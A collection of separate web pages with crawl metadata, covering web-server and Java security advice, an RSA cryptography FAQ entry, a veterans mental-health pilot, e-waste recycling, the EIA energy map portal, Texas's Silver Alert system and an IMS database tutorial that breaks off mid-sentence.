especially the popular blogs or CMSes, will break if you reign in PHP too tightly. Setting safe_mode, for example, will break most PHP. Dallas Kashuba of Dreamhost was kind enough to share with me some PHP settings they use for the few customers that use mod_php. The set of most dangerous PHP functions, ones that should be disabled, are: One final note: an extremely useful module available for Apache is mod_security. Very much like an application firewall device does, mod_security will inspect every transaction and compare it to a list of possible attacks. The rules by which it blocks exploits must be constantly updated, but it's certainly worth the care and feeding. It's all about minimizing the likelihood of break-ins, and then minimizing the impact they can have. There are many more aspects to securing a server in a multi-user environment, which I briefly wrote about previously in, "Keeping a Lid on Linux Logins." Carla Schroder also introduces SELinux, in "Tips For Taming SELinux." As much as we'd like to prevent security incidents in the Web hosting world, we have come to face the reality that they will happen. Come back next week to learn about managing the major problem: the applications themselves.
<urn:uuid:c482dec6-7854-4ad6-9f9e-4f48d39b9895>
CC-MAIN-2017-04
http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/3730741/Learn-Best-Practices-for-Web-Server-Security.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00065-ip-10-171-10-70.ec2.internal.warc.gz
en
0.942345
1,293
2.6875
3
Technology surrounding the Internet is constantly evolving. Many programs that helped allow the Internet expand and become what it is today are still in use. They stay relevant by issuing updates that often bring more functionality while meeting the evolving needs of Web developers and users. One program, however, has had a number of security issues in the past year that have prompted experts and government departments to recommend that users disable it. That program is Java – a programming language and application that allows developers to create web applications, and users to view much of the visual content and animations on the Internet. The problem isn’t with the programming language per se, but with the application developed by Oracle Systems. Oracle released an update to Java – Java 7, Update 10 – in December, but it was found to have some serious security flaws. These issues were quickly spotted by hacker groups who released exploit kits – software making it easy to exploit Java 7’s security weaknesses – giving them full security privileges. This exposed any computer running Java 7 to potential malware and attack. Because Java runs at the browser level, every OS could be targeted. To make matters worse, 30 security flaws were patched back in September, after nearly 1 billion computers were found to be at risk. It’s this string of security red flags that had the US Department of Homeland Security issue a warning that users should disable Java on their browsers. In response to this, Oracle updated Java again, to Java 7, Update 11 on January 12, and noted that the security flaw had been fixed. Many experts, including those at the Department of Homeland Security, aren’t convinced though, and are still suggesting that users disable Java because new vulnerabilities will likely be discovered. How do I disable Java? Internet Explorer users There is no way for you to disable Java in the browser, you will instead have to completely disable Java from your computer. This can be done by following the steps on the Java website. If you do disable Java, some websites will no longer work. This can be a bit of an annoyance, but in all honesty, security of your systems is more important, not to mention the potential costs of dealing with a massive malware infection. Besides that, many websites no longer use Java, so you can probably get by without it. At the very least, we recommend you go download the latest update from the Java website and apply it to all computers. If you would like to learn more about this update, you can visit an excellent FAQ here. Before you do update, or disable Java, we recommend you contact us. We can help advise you on what steps to take next if you use Java.
<urn:uuid:af949d30-c257-422f-ad98-7d3ef0f60877>
CC-MAIN-2017-04
https://www.apex.com/time-cut-back-java/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00065-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958718
539
2.734375
3
1.7 Why is cryptography important? Cryptography allows people to carry over the confidence found in the physical world to the electronic world, thus allowing people to do business electronically without worries of deceit and deception. Every day hundreds of thousands of people interact electronically, whether it is through e-mail, e-commerce (business conducted over the Internet), ATM machines, or cellular phones. The perpetual increase of information transmitted electronically has lead to an increased reliance on cryptography. Cryptography on the Internet The Internet, comprised of millions of interconnected computers, allows nearly instantaneous communication and transfer of information, around the world. People use e-mail to correspond with one another. The World Wide Web is used for online business, data distribution, marketing, research, learning, and a myriad of other activities. Cryptography makes secure web sites (see Question 5.1.2) and electronic safe transmissions possible. For a web site to be secure all of the data transmitted between the computers where the data is kept and where it is received must be encrypted. This allows people to do online banking, online trading, and make online purchases with their credit cards, without worrying that any of their account information is being compromised. Cryptography is very important to the continued growth of the Internet and electronic commerce. E-commerce (see Section 4.2) is increasing at a very rapid rate. By the turn of the century, commercial transactions on the Internet are expected to total hundreds of billions of dollars a year. This level of activity could not be supported without cryptographic security. It has been said that one is safer using a credit card over the Internet than within a store or restaurant. It requires much more work to seize credit card numbers over computer networks than it does to simply walk by a table in a restaurant and lay hold of a credit card receipt. These levels of security, though not yet widely used, give the means to strengthen the foundation with which e-commerce can grow. People use e-mail to conduct personal and business matters on a daily basis. E-mail has no physical form and may exist electronically in more than one place at a time. This poses a potential problem as it increases the opportunity for an eavesdropper to get a hold of the transmission. Encryption protects e-mail by rendering it very difficult to read by any unintended party. Digital signatures can also be used to authenticate the origin and the content of an e-mail message. In some cases cryptography allows you to have more confidence in your electronic transactions than you do in real life transactions. For example, signing documents in real life still leaves one vulnerable to the following scenario. After signing your will, agreeing to what is put forth in the document, someone can change that document and your signature is still attached. In the electronic world this type of falsification is much more difficult because digital signatures (see Question 2.2.2) are built using the contents of the document being signed. Cryptography is also used to regulate access to satellite and cable TV. Cable TV is set up so people can watch only the channels they pay for. Since there is a direct line from the cable company to each individual subscriber's home, the Cable Company will only send those channels that are paid for. Many companies offer pay-per-view channels to their subscribers. Pay-per-view cable allows cable subscribers to "rent" a movie directly through the cable box. What the cable box does is decode the incoming movie, but not until the movie has been ``rented.'' If a person wants to watch a pay-per-view movie, he/she calls the cable company and requests it. In return, the Cable Company sends out a signal to the subscriber's cable box, which unscrambles (decrypts) the requested movie. Satellite TV works slightly differently since the satellite TV companies do not have a direct connection to each individual subscriber's home. This means that anyone with a satellite dish can pick up the signals. To alleviate the problem of people getting free TV, they use cryptography. The trick is to allow only those who have paid for their service to unscramble the transmission; this is done with receivers (``unscramblers''). Each subscriber is given a receiver; the satellite transmits signals that can only be unscrambled by such a receiver (ideally). Pay-per-view works in essentially the same way as it does for regular cable TV. As seen, cryptography is widely used. Not only is it used over the Internet, but also it is used in phones, televisions, and a variety of other common household items. Without cryptography, hackers could get into our e-mail, listen in on our phone conversations, tap into our cable companies and acquire free cable service, or break into our bank/brokerage accounts. Top of the page - 1.1 What is RSA Laboratories' Frequently Asked Questions About Today's Cryptography? - 1.2 What is cryptography? - 1.3 What are some of the more popular techniques in cryptography? - 1.4 How is cryptography applied? - 1.5 What are cryptography standards? - 1.6 What is the role of the United States government in cryptography? - 1.7 Why is cryptography important?
<urn:uuid:2a8fe606-f271-4b70-a19b-0d15ece34c13>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/why-is-cryptography-important.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00094-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94392
1,078
3.40625
3
A pilot project underway in California is testing the use of wireless technologies to treat veterans with mental health issues. The Veterans Transition to Community project leverages patients' cell phones and PDAs to collect their mental health data and increase their contact with health care providers, said Lincoln Smith, the president and CEO of the Altarum Institute. Smith testified before the House Veterans Affairs Committee on Thursday. The nonprofit health systems consultancy developed the protocol to treat veterans suffering from post-traumatic stress disorder, substance use disorders, major depressive disorders and mild traumatic brain injury. Several times a day, over a period of months, the system prompts veterans under care to answer questions designed to document emotional states such as stress, rejection, fear, craving, pain and coping. By amassing a rich data set, Altarum hopes to improve assessment of behavioral health disorders and improve treatment options. "Reminders, supportive messages, pictures of pleasurable memories, inspirational music, and an interactive pain-scale support the service members and veterans to avert crises that may affect them in their transition from the therapeutic environment to work and community life," Smith told lawmakers. "In a time of increasingly tight budget, the incremental cost of maintaining a service member in this program is negligible." Altarum has tested the system at a residential veterans treatment center in Napa Valley. Combining data collected from multiple patients will afford a means to assess treatment options and outcomes of cohorts defined by theater of conflict, service, gender, age and other factors. Up to 20 percent of soldiers serving in Iraq and Afghanistan have been in proximity to explosions that resulted in positive screenings for mild traumatic brain injury, which is associated with a 90 percent increase in the occurrence of post-traumatic stress disorder, reports Altarum. I'm reminded of what the late, great George Carlin had to say on the subject way back in the 1980s, long before cell phones and the war in Afghanistan, which this month became the longest in our nation's history: There's a condition in combat. Most people know about it. It's when a fighting person's nervous system has been stressed to its absolute peak and maximum. Can't take anymore input. The nervous system has either snapped or is about to snap. In the first world war, that condition was called shell shock. Simple, honest, direct language. Two syllables, shell shock. Almost sounds like the guns themselves. That was seventy years ago. Then a whole generation went by and the second world war came along and the very same combat condition was called battle fatigue. Four syllables now. Takes a little longer to say. Doesn't seem to hurt as much. Fatigue is a nicer word than shock. Shell shock! Battle fatigue. Then we had the war in Korea, 1950. Madison Avenue was riding high by that time, and the very same combat condition was called operational exhaustion. Hey, we're up to eight syllables now! And the humanity has been squeezed completely out of the phrase. It's totally sterile now. Operational exhaustion. Sounds like something that might happen to your car. Then of course, came the war in Vietnam, which has only been over for about sixteen or seventeen years, and thanks to the lies and deceits surrounding that war, I guess it's no surprise that the very same condition was called post-traumatic stress disorder. Still eight syllables, but we've added a hyphen! And the pain is completely buried under jargon. Post-traumatic stress disorder. I'll bet you if we'd of still been calling it shell shock, some of those Viet Nam veterans might have gotten the attention they needed at the time. I'll betcha. I'll betcha. Today, veterans receiving some type of treatment from the Veterans Affairs Department attempt 950 suicide each month, according to Army Times. Suicide is a bigger risk factor for death than is suicide bombers. Thank god we now have an app for that. I wonder what George would say?
<urn:uuid:6feea639-377e-4761-b714-e5cddeba6efb>
CC-MAIN-2017-04
http://www.nextgov.com/health/health-it/2010/06/textual-healing/53488/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280065.57/warc/CC-MAIN-20170116095120-00002-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960947
805
2.5625
3
According to an article in PCworld Magazine by Christina DesMarais, (http://www.pcworld.com/article/2048908/trashing-bans-not-reducing-office-e-waste.html), last week Jean-Daniel Saphores, an applied economist at the University of California-Irvine, presented research regarding U.S. recycling rates at the annual meeting of the American Chemical Society in Indianapolis. He surveyed 3,156 U.S. households and asked them how they had disposed of junk cell phones and how they intended to get rid of unwanted TVs. At the time of his 2010 survey only California had legislation on the books regarding the disposal of cell phones and 13 states had laws that covered throwing away TVs. The study revealed that there is absolutely no difference in the statistics regarding proper disposal of ewaste in states that have legislation versus those that don’t. Saphores’ summary is that legislation is virtually useless. The author continues to write facts that we’ve been saying for years: “Electronic waste from the U.S. often ends up in developing countries where workers at scrap yards, some of whom are children, are exposed to hazardous chemicals and poisons while looking for valuable metals. Along with elements such as gold and copper, anything with a circuit board contains toxic substances, including lead, nickel, cadmium, mercury, brominated flame retardants (BFRs) or the chlorinated plastic, polyvinyl chloride (PVC), all of which harm the environment. Of the 1,352 e-scrap processing plants in the United States only 114 are certified by a non-profit called e-Stewards not to export overseas, dump or burn their waste. E-Stewards says only 11-14 percent of e-waste is sent to recyclers—the rest ends up in landfills or is burned resulting in soil, water and air pollution. Of the e-waste sent to e-cyclers, 70-80 percent of it is exported to countries with lax environmental and labor regulations.” Drop us a line if you’d like to learn more about our e-stewards certification and what it means for our clients. firstname.lastname@example.org.
<urn:uuid:34d04bac-9774-49bf-98fb-f5558204a726>
CC-MAIN-2017-04
http://anythingit.com/blog/page/2/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00396-ip-10-171-10-70.ec2.internal.warc.gz
en
0.949955
481
2.859375
3
A new interactive Web portal is making it easier for researchers to study energy resources and compare carbon emissions state-by-state throughout the U.S. Developed by the U.S. Energy Information Administration (EIA) and launched in April, the site features customizable maps with a variety of data layers, including the ability to display energy resources and infrastructure at the national, state, Congressional district or county level. EIA — the independent statistical and analytical agency within the U.S. Department of Energy — previously published the information in separate state energy profiles. The profiles were used by policy makers, researchers, analysts and other decision makers to evaluate the energy market. The new portal now pulls all that data into a central location, making research more efficient and thorough for users. Mark Elbert, director of EIA’s Office of Web Management, said the interactive map provides approximately 36 distinct layers of information that can be toggled on and off. For example, users can zoom in on maps to see energy facilities and resources relating to production, distribution, fossil fuel resources and renewable energy. The portal also summarizes each state’s ranking of its energy production, consumption, prices and emissions. Other features include a variety of external links to state-specific energy resources, and the ability to see who owns what energy resources in specific locations. For example, the map can show whether a pipeline located in federal lands is under the jurisdiction of the U.S. Department of Interior’s Bureau of Land Management, or if a resource is in an area run by the U.S. Forest Service. There’s also detailed information on the 6,300 power plants in the U.S., including fuel usage and monthly energy output. The new capabilities have been valuable for stakeholders such as the National Association of State Energy Officials (NASEO). The association represents the interests of the State and Territory Energy Offices (SEOs) that were formed as a result of the energy crisis in the 1970s. Those offices are responsible for energy policies and research in the U.S. Jeffrey Pillon, director of NASEO’s Energy Assurance Program explained that association members find the mapping feature of EIA’s new portal useful because of how it displays the locations of energy infrastructure geographically between states and regions. “That’s very valuable to help inform the policy makers, because you can give them a good visual representation on where pipelines, power plants and wind turbine farms are at,” Pillon said. “It can be helpful in developing a better understanding of how those energy resources are distributed.” Data Scrubbing; Mobile Future The portal was developed by EIA staff over a period of nine months for approximately $130,000. The map uses Esri’s GIS mapping software and pulls geodata from a variety of governmental agencies. For example, EIA uses wind maps from the National Renewable Energy Laboratory. According to Elbert, the amount of interagency cooperation was a challenge, particularly in the area of data security. He said that due to a lot of post-911 measures, there was a lot of “scrubbing” of federal websites, particularly of geographical information. So it took awhile for guidance to emerge on how granular the display of data should be. “To be honest, it was still a little daunting to get this in front of people at the TSA and Department of Homeland Security,” Elbert said. “There are various groups within the government who are delegated with certain aspects of security, so we had to talk to a lot of people.” One modification made to the portal because of those meetings and security concerns was a limitation on the ability to zoom in on an area. The U.S. Department of Transportation’s pipeline layer on the map was restricted so a person can only view one county at a time. There were also various copyright restrictions from commercial vendors that did not want certain power grids displayed at close resolution. Although the data sources are diverse, the map isn’t updated in real-time. Elbert explained that EIA wanted to focus on quality assurance and system stability. Instead of automating the process, they decided to manually gather the data from the other agencies, review it, and then update the portal on a quarterly basis. As time goes on, EIA hopes to upgrade the portal. One of the things they’d like to do is create a mobile site so smartphone users have a streamlined method of accessing the data. Although he’s gotten feedback from researchers and people on Capitol Hill that most of the portal’s use is by intensive users that rely on desktop computing, Elbert was confident a market exists for a mobile version of the site. Pillon was supportive of the moves EIA has made with the portal and its future plans. He felt the challenge for EIA won’t be in acquiring data, but rather presenting it in a way so it can be understood clearly by multiple audiences. “We increase our capability to provide finer levels of details, but it’s important for people to understand what that detail really means and interpret that data in a correct way,” Pillon said.
<urn:uuid:3f717be3-bce5-40e3-b31f-5f7614ef371d>
CC-MAIN-2017-04
http://www.govtech.com/e-government/New-Portal-Boosts-Energy-Research.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280774.51/warc/CC-MAIN-20170116095120-00396-ip-10-171-10-70.ec2.internal.warc.gz
en
0.945736
1,087
3
3
Photo of the Week -- Two Solar Flares Erupt Within Two Hours / June 10, 2014 On June 10, 2014, the sun emitted a significant solar flare that peaked at 4:42 a.m. Pacific Daylight Time on June 10, 2014. Solar flares release an intense burst of radioactivity into space, but as UPI reported, the waves can't penetrate Earth's atmosphere and harm humans. But they can momentarily disrupt GPS and communication satellites. As the solar physicist Tony Phillips of spaceweather.com told the Los Angeles Times, X-rays and UV radiation from the two flares messed with some radio transmissions over Europe.
<urn:uuid:09383bb1-bee5-4dbe-8956-6b1e2438b028>
CC-MAIN-2017-04
http://www.govtech.com/photos/Photo-of-the-Week----Two-Solar-Flares-Erupt-Within-Two-Hours.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00360-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910694
131
3.0625
3
When 89-year-old Cruz Fierro wandered the streets of El Paso, Texas, in May 2006, after his release from the Beaumont Medical Center, residents didn't know the elderly man was disoriented and suffered from Alzheimer's disease. Very few people knew he was missing until several days later, when Fierro was found dead and local media reported the story. This tragic event made Texas Rep. Joe Pickett and the Texas Silver-Haired Legislature - a nonprofit group that encourages senior citizens to get involved in the legislative process - question why an alert system wasn't in place to notify the public of missing elderly people, especially in central Texas, which has one of the highest elderly populations in the country. "Had there been some notification system in place, it may have been possible to save him" Pickett said. This was especially troubling to policy-makers since the Amber (America's Missing: Broadcast Emergency Response) Alert system originated in Texas. Amber Alert notifies media and law enforcement agencies when children go missing and broadcasts messages across roadway signs to inform the public. The Texas Silver-Haired Legislature recommended the creation of a "Silver Alert" system to Texas lawmakers as a way to quickly notify Texas residents when an elderly person with Alzheimer's disease or dementia is missing. The Texas Legislature held hearings on the possibility of such a system, and heard many stories of elderly people who went missing. Cruz Fierro is one of an estimated 900 elderly people reported missing every year in Texas. Pickett helped create legislation establishing Silver Alert, which was passed in May 2007 as SB 1315 and will go into effect Sept. 1, 2007. The Texas Silver Alert system will cost relatively little to implement, Pickett said, since it will use the same infrastructure as the state Amber Alert system. "This program has a potential for saving a lot of lives," said Carlos Higgins, secretary of the Texas Silver-Haired Legislature and chair of its legislative action committee. "It's just a means of the community letting people know who they need to be on the lookout for and what sort of person they need to be looking for." If Texans over the age of 65 have Alzheimer's, dementia, are mentally impaired in some way and are reported missing, the Texas Department of Public Safety (TDPS) will then determine the appropriate alerting avenues at state, regional or local levels. Pickett said the TDPS can send alerts to all levels of law enforcement agencies, TV, radio and newsprint media, and show warnings on freeway message boards. "Because an alert will come from an official base, like the TDPS, there will be no question about it," he said. "If I called TV news and said my 86-year-old parent is missing, they aren't going to cover it unless there is an official notice." Texas isn't alone in developing systems to locate missing seniors. Other states are working on or have already rolled out Silver Alert programs, most of which also use pre-established Amber Alerts systems. Michigan extended its Amber Alert program to include senior citizens in 2001, and Illinois' Silver Alert program went live in 2006. In February 2007, Colorado's governor signed HB07-1005 into law, creating an alert program for senior citizens and people with developmental disabilities. Virginia, Indiana and Oklahoma are ironing out the details of similar programs, and California officials have contacted the Texas Silver-Haired Legislature about Texas' Silver Alert program, Higgins said. Former New York Gov. George Pataki vetoed a bill to create a Silver Alert system, however, saying another type of alert would make missing-person alerts too common. Pickett said that while drafting the legislation to create Texas' Silver Alert program, legislators were careful to keep Silver Alert to a narrow, specified demographic of at-risk elderly people to avoid making alerts too frequent. Approximately 5.1 million people in the United States suffer some form of dementia, and about 60 percent of those will wander away from their homes or care facilities, said Monica Moreno, associate director of safety services for the Alzheimer's Association. "That's a huge number of people at risk, and we never know when they may wander," Moreno said, adding that the first 24 hours are critical because 50 percent of the elderly who are lost either sustain serious injuries or die after that first day. When those afflicted with Alzheimer's or dementia wander around a town or rural area, they often don't respond to others because they regress to childhood, according to the association. The Silver Alert complements existing programs for people with dementia, including Project Lifesaver International, which features personalized wristbands that emit tracking signals. When a caregiver notifies a local Project Lifesaver agency of a missing person, a search and rescue team uses a GPS-enabled mobile tracking system to find the person. Project Lifesaver says its recovery time averages 30 minutes. The Alzheimer Association's Safe Return program consists of a national identification database for people with Alzheimer's and wallet cards, special pendants or bracelets, clothing labels, lapel pins and bag tags that specify a person belongs to the program. Anyone who finds an elderly person wandering the streets can call the Safe Return toll-free number listed on the elderly person's wallet card or bracelet, and the operator will alert family members or a caregiver listed in the database. The Safe Return program also files a report similar to a missing persons report and submits it to law enforcement agencies. Since its inception in 1993, nearly 100,000 people have registered with Safe Return, and the program says it has a 99 percent success rate, helping more than 7,500 individuals reunite with their families and caregivers. In 2006, the Safe Return program helped facilitate the return of more than 1,600 who had wandered or became lost, Moreno said, noting that two-thirds of the calls received by Safe Return are from police officers or people who notice something is wrong with a person. "A person can be very active with this disease. They're in the early stages and still driving. They're going about their normal routine and at some point during their daily activity, they become confused, disoriented and they don't know where they were going and where they came from," Moreno said. "That's when we find a situation when a Good Samaritan notices that there's something not right with that person, and that's when they call us." Through these numerous safety measures and alert systems, losing an elderly person from wandering is becoming less likely. The Texas Silver Alert system is important to Katherine Higgins, Carlos Higgins' wife who's also a member of Texas Silver-Haired Legislature. She feels her uncle's death may have been avoided if such a system had existed 15 years ago -- her uncle wandered from his home in Tulia, Texas, in 1993. He was missing for six days until he was found dead in an Oklahoma field."I thought it might have been useful when my uncle disappeared," Katherine Higgins said. "Only after Amber Alerts, people started saying, 'Well, you look for missing children. Now how about the elderly?'"
<urn:uuid:497adf95-655f-4f78-be8e-398e31a31142>
CC-MAIN-2017-04
http://www.govtech.com/health/Saving-Seniors.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280485.79/warc/CC-MAIN-20170116095120-00176-ip-10-171-10-70.ec2.internal.warc.gz
en
0.960359
1,459
2.546875
3
Content migrated from the dbazine.com site This article provides a high-level overview of IMS database concepts, terminology, and database design considerations. It covers the following topics: The term database means a collection of related data organized in a way that can be processed by application programs. A database management system (DBMS) consists of a set of licensed programs that define and maintain the structure of the database and provide support for certain types of application programs. The types of database structures are network, relational, and hierarchical. This manual presents information on IMS, a hierarchical database management system from IBM*. The IMS software environment can be divided into five main parts: Data Language I (DL/I) DL/I control blocks data communications component (IMS TM) Figure 1-1 shows the relationships of the IMS components. We discuss each of these components in greater detail in this and subsequent chapters. Figure 1-1: IMS environment components. Before the development of DBMSs, data was stored in individual files, or as flat files. With this system, each file was stored in a separate data set in sequential or indexed format. To retrieve data from the file, an application had to open the file and read through it to the location of the desired data. If the data was scattered through a large number of files, data access required a lot of opening and closing of files, creating additional I/O and processing overhead. To reduce the number of files accessed by an application, programmers often stored the same data in many files. This practice created redundant data and the related problems of ensuring update consistency across multiple files. To ensure data consistency, special cross-file update programs had to be scheduled following the original file update. The concept of a database system resolved many data integrity and data duplication issues encountered in a file system. A database stores the data only once in one place and makes it available to all application programs and users. At the same time, databases provide security by limiting access to data. The user's ability to read, write, update, insert, or delete data can be restricted. Data can also be backed up and recovered more easily in a single database than in a collection of flat files. Database structures offer multiple strategies for data retrieval. Application programs can retrieve data sequentially or (with certain access methods) go directly to the desired data, reducing I/O and speeding data retrieval. Finally, an update performed on part of the database is immediately available to other applications. Because the data exists in only one place, data integrity is more easily ensured. The IMS database management system as it exists today represents the evolution of the hierarchical database over many years of development and improvement. IMS is in use at a large number of business and government installations throughout the world. IMS is recognized for providing excellent performance for a wide variety of applications and for performing well with databases of moderate to very large volumes of data and transactions. Because they are implemented and accessed through use of the Data Language I (DL/I), IMS databases are sometimes referred to as DL/I databases. DL/I is a command-level language, not a database management system. DL/I is used in batch and online programs to access data stored in databases. Application programs use DL/I calls to request data. DL/I then uses system access methods, such as Virtual Storage Access Method (VSAM), to handle the physical transfer of data to and from the database. IMS databases are often referred to by the access method they are designed for, such as HDAM, PHDAM, HISAM, HIDAM, and PHIDAM. IMS makes provisions for nine types of access methods, and you can design a database for any one of them. We discuss each of them in greater detail in Chapter 2, "IMS Structures and Functions." The point to remember is that they are all IMS databases, even though they are referred to by access type. When you create an IMS database, you must define the database structure and how the data can be accessed and used by application programs. These specifications are defined within the parameters provided in two control blocks, also called DL/I control blocks: database description (DBD) program specification block (PSB) In general, the DBD describes the physical structure of the database, and the PSB describes the database as it will be seen by a particular application program. The PSB tells the application which parts of the database it can access and the functions it can perform on the data. Information from the DBD and PSB is merged into a third control block, the application control block (ACB). The ACB is required for online processing but is optional for batch processing. The IMS Transaction Manager (IMS TM) is a separate set of licensed programs that provide access to the database in an online, real-time environment. Without the TM component, you would be able to process data in the IMS database in a batch mode only. With the IMS TM component, you can access the data and can perform update, delete, and insert functions online. As Figure 1-1 shows, the IMS TM component provides the online communication between the user and DL/I, which, in turn, communicates with the application programs and the operating system to access and process data stored in the database. The data in a database is of no practical use to you if it sits in the database untouched. Its value comes in its use by application programs in the performance of business or organizational functions. With IMS databases, application programs use DL/I calls embedded in the host language to access the database. IMS supports batch and online application programs. IMS supports programs written in ADA, assembler, C, COBOL, PL/I, VS PASCAL, and REXX. There are several types of database management systems, categorized generally by how they logically store and retrieve data. The two most common types in use today are relational and hierarchical. Each type has its advantages and disadvantages, and in many organizations both types are used. Whether you choose a relational or hierarchical database management system depends largely on how you intend to use the data being stored. In a relational database, data is stored in a table made up of rows and columns. A separate table is created for logically related data, and a relational database may consist of hundreds or thousands of tables. Within a table, each row is a unique entity (or record) and each column is an attribute common to the entities being stored. In the example database described in Table 1-1 on page 1-9, Course No. has been selected as the key for each row. It was chosen because each course number is unique and will be listed only once in the table. Because it is unique for each row, it is chosen as the key field for that row. For each row, a series of columns describe the attributes of each course. The columns include data on title, description, instructor, and department, some of which may not be unique to the course. An instructor, for instance, might teach more than one course, and a department may have any number of courses. It is important early in design of a database to determine what will be the unique, or key, data element. Now let's look at the same data stored in a hierarchical format. This time the data is arranged logically in a top-down format. In a hierarchical database, data is grouped in records, which are subdivided into a series of segments. In the example Department database on Figure 1-2 on page 1-8, a record consists of the segments Dept, Course, and Enroll. In a hierarchical database, the structure of the database is designed to reflect logical dependencies-certain data is dependent on the existence of certain other data. Enrollment is dependent on the existence of a course, and, in this case, a course is dependent on the existence of a department. In a hierarchical database, the data relationships are defined. The rules for queries are highly structured. It is these fixed relationships that give IMS extremely fast access to data when compared to a relational database. Speed of access and query flexibility are factors to consider when selecting a DBMS. Strengths and Weaknesses Hierarchical and relational systems have their strengths and weaknesses. The relational structure makes it relatively easy to code requests for data. For that reason, relational databases are frequently used for data searches that may be run only once or a few times and then changed. But the query-like nature of the data request often makes the relational database search through an entire table or series of tables and perform logical comparisons before retrieving the data. This makes searches slower and more processing-intensive. In addition, because the row and column structure must be maintained throughout the database, an entry must be made under each column for every row in every table, even if the entry is only a place holder-a null entry. This requirement places additional storage and processing burdens on the relational system. With the hierarchical structure, data requests or segment search arguments (SSAs) may be more complex to construct. Once written, however, they can be very efficient, allowing direct retrieval of the data requested. The result is an extremely fast database system that can handle huge volumes of data transactions and large numbers of simultaneous users. Likewise, there is no need to enter place holders where data is not being stored. If a segment occurrence isn't needed, it isn't inserted. The choice of which type of DBMS to use often revolves around how the data will be used and how quickly it should be processed. In large databases containing millions of rows or segments and high rates of access by users, the difference becomes important. A very active database, for example, may experience 50 million updates in a single day. For this reason, many organizations use relational and hierarchical DBMSs to support their data management goals. Sample Hierarchical Database To illustrate how the hierarchical structure looks, we'll design two very simple databases to store information for the courses and students in a college. One database will store information on each department in the college, and the second will contain information on each college student. In a hierarchical database, an attempt is made to group data in a one-to-many relationship. An attempt is also made to design the database so that data that is logically dependent on other data is stored in segments that are hierarchically dependent on the data. For that reason, we have designated Dept as the key, or root, segment for our record, because the other data would not exist without the existence of a department. We list each department only once. We provide data on each course in each department. We have a segment type Course, with an occurrence of that type of segment for each course in the department. Data on the course title, description, and instructor is stored as fields within the Course segment. Finally, we have added another segment type, Enroll, which will include the student IDs of the students enrolled in each course. In Figure 1-2, we also created a second database called Student. This database contains information on all the students enrolled in the college. This database duplicates some of the data stored in the Enroll segment of the Department database. Later, we will construct a larger database that eliminates the duplicated data. The design we choose for our database depends on a number of factors; in this case, we will focus on which data we will need to access most frequently, The two sample databases, Department and Student, are shown in Figure 1-2. The two databases are shown as they might be structured in relational form in Table 1-1, Table 1-2, and Table 1-3 on page 1-9. Figure 1-2: Sample hierarchical databases for department and student. The segments in the Department database are as follows: |Dept||Information on each department. This segment includes fields for the department ID (the key field), department name, chairman's name, number of faculty, and number of students registered in departmental courses.| |Course||This segment includes fields for the course number (a unique identifier), course title, course description, and instructor's name.| |Enroll||The students enrolled in the course. This segment includes fields for student ID (the key field), student name, and grade.| The segments in the Student database are as follows: |Student||Student information. It includes fields for student ID (key field), student name, address, major, and courses completed.| Billing information for courses taken. It includes fields for semester, tuition due, tuition paid, and scholarship funds applied. The dotted line between the root (Student) segment of the Student database and the Enroll segment of the Department database represents a logical relationship based on data residing in one segment and needed in the other. Logical relationships are explained in detail in "The Role of Logical Relationships" on page 2-55. Example Relational Structure Tables 1-1, 1-2 and 1-3 show how the two hierarchical Department and Student databases might be structured in a relational database management system. We have broken them down into three tables-Course, Student, and Department. Notice that we have had to change the way some data is stored to accommodate the relational format. |Course No.||Course Title||Description||Instructor||Dept ID| |HI-445566||History 321||Survey course||J. R. Jenkins||HIST| |MH-778899||Algebra 301||Freshman-level||A.L. Watson||MATH| |BI-112233||Biology 340||Advanced course||B.R. Sinclair||BIOL| Table 1-1: Course database in relational table format. |Student ID||Student Name||Address||Major| |123456777||Jones, Bill||1212 N. Main||History| |123456888||Smith, Jill||225B Baker St||Physics| |123456999||Brown, Joe||77 Sunset St||Zoology| Table 1-2: Student database in relational table format. |Dept ID||Dept. Name||Chairman||Budget Code| |HIST||History||J. B. Hunt||L72| |MATH||Mathematics||R. K. Turner||A54| |BIOL||Biology||E. M. Kale||A25| Table 1-3: Department database in relational table format. Before implementing a hierarchical structure for your database, you should analyze the end user's processing requirements, because they will determine how you structure the database. To help you understand the business processing needs of the user, you can construct a local view consisting of the following: list of required data elements controlling keys of the data elements data groupings for each process, reflecting how the data is used in business practice mapping of the data groups that shows their relationships In particular, you must consider how the data elements are related and how they will be accessed. The topics that follow should help you in that process. Normalization of Data Even though you have a collection of data that you want to store in a database, you may have a hard time deciding how the data should be organized. Normalization of data refers to the process of breaking data into affinity groups and defining the most logical, or normal, relationships between them. There are accepted rules for the process of data normalization. Normalization usually is discussed in terms of form. Although there are five levels of normalization form, it is usually considered sufficient to take data to the third normalization form. For most uses, you can think of levels of normalization as the following: First normal form. The data in this form is grouped under a primary key-a unique identifier. In other words, the data occurs only once for each key value. Second normal form. In this form, you remove any data that was only dependent on part of the key. For example, in Table 1-1 on page 1-9, Dept ID could be part of the key, but the data is really only dependent on the Course No. Third normal form. In this form, you remove anything from the table that is not dependent on the primary key. In Table 1-3, the Department table, if we included the name of the University President, it would occur only once for each Dept ID, but it is in no way dependent on Dept ID. So that information is not stored here. The other columns, Dept. Name, Chairman, and Budget Code, are totally dependent on the Dept ID. Example Database Expanded At this point we have learned enough about database design to expand our original example database. We decide that we can make better use of our college data by combining the Department and Student databases. Our new College database is shown in Figure 1-3. Figure 1-3: College database (combining department and student databases). The following segments are in the expanded College database: |College||The root segment. One record will exist for each college in the university. The key field is the 